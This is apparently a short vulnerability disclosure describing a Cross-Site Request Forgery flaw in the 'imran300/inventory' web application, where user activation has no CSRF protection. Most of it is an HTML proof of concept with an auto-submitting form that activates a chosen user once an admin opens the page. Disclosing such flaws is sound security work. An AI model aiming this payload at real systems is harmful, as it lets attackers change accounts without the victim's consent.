Cross-Site Request Forgery (CSRF) in imran300/inventory
Sep 4th 2021
You didn't set any CSRF protection for activating a user.
🕵️♂️ Proof of Concept
<html> <body> <script>history.pushState('', '', '/')</script> <form action="http://localhost:8000/inventory/index.php/Users/activeStatus/7"> <input type="submit" value="Submit request" /> </form> <script> document.forms.submit(); </script> </body> </html>
After that admin open the PoC.html file the user with id 7 will be activated.
This vulnerability is capable of activate any user with on click.